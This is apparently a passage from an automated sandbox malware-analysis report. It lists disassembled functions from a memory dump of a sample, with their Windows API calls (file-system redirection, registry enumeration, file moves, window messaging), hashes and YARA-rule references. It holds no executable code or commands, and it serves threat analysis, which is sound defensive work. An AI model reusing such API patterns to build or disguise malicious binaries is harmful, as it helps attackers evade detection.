                                              Function 00E86332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E8637F,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E8633E
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E86350
                                              • FreeLibrary.KERNEL32(00000000,?,?,00E8637F,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86362
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-3689287502
                                              • Opcode ID: 389abd921d1ebddacf639468b31693258ad057aa11daa9bec6140102073d95c9
                                              • Instruction ID: 3ff0179791180cfb4ca4fd251224cd737c137d7c58a3d6f6f78ce60722652b32
                                              • Opcode Fuzzy Hash: 389abd921d1ebddacf639468b31693258ad057aa11daa9bec6140102073d95c9
                                              • Instruction Fuzzy Hash: CCE08632601B2167A21527156C08B9A76289FC1B1A70A4015FD08F2100EF64CC01A1B1
                                              Function 00E862FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00EC54C3,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86304
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E86316
                                              • FreeLibrary.KERNEL32(00000000,?,?,00EC54C3,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86329
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-1355242751
                                              • Opcode ID: 7d45a6af4fe53e5613834d7edd34d79cab95c70cad95b5bedc7cb711bfd1a1b2
                                              • Instruction ID: b4e3596f01f0d4078e631452c4cd05792822b3d27c90c5f2492cde81ef83e284
                                              • Opcode Fuzzy Hash: 7d45a6af4fe53e5613834d7edd34d79cab95c70cad95b5bedc7cb711bfd1a1b2
                                              • Instruction Fuzzy Hash: 6AD012356425356B96263725BC189CF7E24DFC5B1A3464015BC0CB2228DF64CD0196D1
                                              Function 00F0ACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00F0AD86
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F0AD94
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F0ADC7
                                              • CloseHandle.KERNEL32(?), ref: 00F0AF9C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                              • String ID:
                                              • API String ID: 3488606520-0
                                              • Opcode ID: a7a9bd4d131b2f56c926dda890e883945605179381a262bcd28f55c3663f7b36
                                              • Instruction ID: bd9e492a452b65c79cf9bfef5dea546eaa58e433d0d089993b2cc1a10397749a
                                              • Opcode Fuzzy Hash: a7a9bd4d131b2f56c926dda890e883945605179381a262bcd28f55c3663f7b36
                                              • Instruction Fuzzy Hash: 83A18FB16043019FD720EF24C886B2AB7E5AF44720F14885DF999AB3D2DB70EC40DB92
                                              Function 00F0C328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00F0D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0C00D,?,?), ref: 00F0D314
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D350
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3C7
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3FD
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0C404
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F0C45F
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F0C4C2
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00F0C505
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0C512
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                              • String ID:
                                              • API String ID: 826366716-0
                                              • Opcode ID: 8de4b780125f62900f82cc60ae16503b17cd93bf892cf72c12011eb3052acfbb
                                              • Instruction ID: b130df97ba4458bfbadb544f0f8a1f786366cb4680c630d69abaf2ed15926466
                                              • Opcode Fuzzy Hash: 8de4b780125f62900f82cc60ae16503b17cd93bf892cf72c12011eb3052acfbb
                                              • Instruction Fuzzy Hash: 0E61A035608241AFD714DF24C890E6ABBF5FF84318F14859CF4598B2A2DB31ED46EB92
                                              Function 00EEEC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00EEE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EED6E2,?), ref: 00EEE629
                                                • Part of subcall function 00EEE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EED6E2,?), ref: 00EEE642
                                                • Part of subcall function 00EEE9C5: GetFileAttributesW.KERNELBASE(?,00EED755), ref: 00EEE9C6
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00EEEC9F
                                              • MoveFileW.KERNEL32(?,?), ref: 00EEECD8
                                              • _wcslen.LIBCMT ref: 00EEEE17
                                              • _wcslen.LIBCMT ref: 00EEEE2F
                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00EEEE7C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                              • String ID:
                                              • API String ID: 3183298772-0
                                              • Opcode ID: 573e92b9d687c7f2ac7ae871237515d0b563be6570a35a31414b0422639a7b3a
                                              • Instruction ID: a7cccdc87e019483a36ab27c419130c0e9848ca060e1be5746e4901bcb681af6
                                              • Opcode Fuzzy Hash: 573e92b9d687c7f2ac7ae871237515d0b563be6570a35a31414b0422639a7b3a
                                              • Instruction Fuzzy Hash: 7E5176B21083C99BC764EBA1D8419DBB3ECAF85310F00192EF189A3152EF70A68C8756
                                              Function 00EB23E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 41c4b0dcd1a016974fe68a977ce009ca7bf55b3619badd0338c2d5b09493b66d
                                              • Instruction ID: 61267776b0406b3f808ac9f1896ebf5ef111bb7ed564e0f039642c8b06c33348
                                              • Opcode Fuzzy Hash: 41c4b0dcd1a016974fe68a977ce009ca7bf55b3619badd0338c2d5b09493b66d
                                              • Instruction Fuzzy Hash: 1241D472A002049FDB20DF78C881A9EB7F5EF89314F1555ACEA15FB295DA31ED01DB40
                                              Function 00EF41CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetInputState.USER32 ref: 00EF4225
                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00EF427C
                                              • TranslateMessage.USER32(?), ref: 00EF42A5
                                              • DispatchMessageW.USER32(?), ref: 00EF42AF
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF42C0
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                              • String ID:
                                              • API String ID: 2256411358-0
                                              • Opcode ID: f733d90f7b27c5e15e097af2f655a301a0b16bd7f8f48494ad58ddecd2beb1c3
                                              • Instruction ID: a067d0c07be62893517ff6fcabc82988a96cb2514dab89b5b7f1232b8545f13e
                                              • Opcode Fuzzy Hash: f733d90f7b27c5e15e097af2f655a301a0b16bd7f8f48494ad58ddecd2beb1c3
                                              • Instruction Fuzzy Hash: 8A31A4B050434D9EFB65CB649C09BB73BECAB1130AF04157EE762A21F0E7649985EB11
                                              Function 00EE2191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00EE21A5
                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00EE2251
                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00EE2259
                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00EE226A
                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00EE2272
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: 209de8937fe59c81a478bc585c3611098d4de5f1f030322a3b4393827103315f
                                              • Instruction ID: 90b34c69366cb3d4ecf2f8ec1322792e601ded963e40d891ca915cc95e83a9d7
                                              • Opcode Fuzzy Hash: 209de8937fe59c81a478bc585c3611098d4de5f1f030322a3b4393827103315f
                                              • Instruction Fuzzy Hash: B131B37190025DEFDB04CFA8DD49ADE3BB5EB18319F108219FB25A72E0C770A944DB90
                                              Function 00F16065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F160A4
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F160FC
                                              • _wcslen.LIBCMT ref: 00F1610E
                                              • _wcslen.LIBCMT ref: 00F16119
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F16175
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$_wcslen
                                              • String ID:
                                              • API String ID: 763830540-0
                                              • Opcode ID: f036667163753c1179d487c40288906185d88ceed491f3e27cc363a6d5adf469
                                              • Instruction ID: 813d166b7f67f4557a595c21d9dfc0006f12bae2f31127a0db1077fa6355d956
                                              • Opcode Fuzzy Hash: f036667163753c1179d487c40288906185d88ceed491f3e27cc363a6d5adf469
                                              • Instruction Fuzzy Hash: 24216F72D04218ABDF109FA4DC84AEEBBB8EB45724F108216FA25EA1C1D77499C5EF50
                                              Function 00EE089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?,?,?,00EE0BEE), ref: 00EE08BB
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?,?), ref: 00EE08D6
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?,?), ref: 00EE08E4
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?), ref: 00EE08F4
                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?,?), ref: 00EE0900
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: 173bdf68972db4fbd3cf658cf97d7cd9034f11e91f01753fe7f59b127865d422
                                              • Instruction ID: 5dfa98c84195d2f9b95761ee095606d84f8331ef2ef0d47700f9d608e017349a
                                              • Opcode Fuzzy Hash: 173bdf68972db4fbd3cf658cf97d7cd9034f11e91f01753fe7f59b127865d422
                                              • Instruction Fuzzy Hash: 92018F7660021CBFDB104F66DC04B9A7ABDEB88761F158024F945E2211E7B5DE809BA0
                                              Function 00EF0BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0BE0
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0BED
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0BFA
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0C07
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0C14
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0C21
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 34cd6b3835dff229c8a3fd45155e70adc2e2bce8046f43cb01c8b6aad06ec217
                                              • Instruction ID: d2bbc815ddaaa720c9cfbfef0d3391e9de1e6219d73cb8f30d3e73bd68e8249f
                                              • Opcode Fuzzy Hash: 34cd6b3835dff229c8a3fd45155e70adc2e2bce8046f43cb01c8b6aad06ec217
                                              • Instruction Fuzzy Hash: C701A271800B19DFCB30AF66D980826FBF5EF503193159A3ED29262932C771A945DF80
                                              Function 00EE64D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 00EE64E7
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EE64FE
                                              • MessageBeep.USER32(00000000), ref: 00EE6516
                                              • KillTimer.USER32(?,0000040A), ref: 00EE6532
                                              • EndDialog.USER32(?,00000001), ref: 00EE654C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: f363d8247a67217d9af4a24533eb2fc8d4f8e89d3f96759ced881358db9b1f3c
                                              • Instruction ID: 22b08069a3b13755855ad7cc77a5bdcf63a3051bc97bcf3828d63a4bd1599359
                                              • Opcode Fuzzy Hash: f363d8247a67217d9af4a24533eb2fc8d4f8e89d3f96759ced881358db9b1f3c
                                              • Instruction Fuzzy Hash: AD01D13060070CABEB205B60DD4EBD677B8BB20B09F004959B597B10E0DBF4AA48CB90
                                              Function 00EB2630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00EB264E
                                                • Part of subcall function 00EB2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBDB71,00F51DC4,00000000,00F51DC4,00000000,?,00EBDB98,00F51DC4,00000007,00F51DC4,?,00EBDF95,00F51DC4), ref: 00EB2D6E
                                                • Part of subcall function 00EB2D58: GetLastError.KERNEL32(00F51DC4,?,00EBDB71,00F51DC4,00000000,00F51DC4,00000000,?,00EBDB98,00F51DC4,00000007,00F51DC4,?,00EBDF95,00F51DC4,00F51DC4), ref: 00EB2D80
                                              • _free.LIBCMT ref: 00EB2660
                                              • _free.LIBCMT ref: 00EB2673
                                              • _free.LIBCMT ref: 00EB2684
                                              • _free.LIBCMT ref: 00EB2695
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: fc8ba168c0f8f5ede5b69468d86765083a0884e11b5b05bab5a807a91b31f947
                                              • Instruction ID: bdef99960ffde6908a463b1d408a456f6cff973036fff232d9eaf81c6a5ad88a
                                              • Opcode Fuzzy Hash: fc8ba168c0f8f5ede5b69468d86765083a0884e11b5b05bab5a807a91b31f947
                                              • Instruction Fuzzy Hash: 57F03A79A013288B8741AF64AC0299A3BE4BF267523011B0FFB14E2275C7701942BFC5
                                              Function 00EECA3D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EECAC6
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00EECB0C
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F52990,01116050), ref: 00EECB55
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem
                                              • String ID: 0
                                              • API String ID: 135850232-4108050209
                                              • Opcode ID: e7e2d524fa4ac479a43bf82be8ed7b5f3c7b01af5bf5f686c1074604a4f9b565
                                              • Instruction ID: 8e2aedd03aa38dadb41f7d56f3f6f8f294a1b2b03932b9087afc869b6e5168b6
                                              • Opcode Fuzzy Hash: e7e2d524fa4ac479a43bf82be8ed7b5f3c7b01af5bf5f686c1074604a4f9b565
                                              • Instruction Fuzzy Hash: C841F5312053859FD720DF29CC46F5ABBE8AF84324F245A2DF965A72D1D770E806CB92
                                              Function 00F14D75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F1DCD0,00000000,?,?,?,?), ref: 00F14E09
                                              • GetWindowLongW.USER32 ref: 00F14E26
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F14E36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
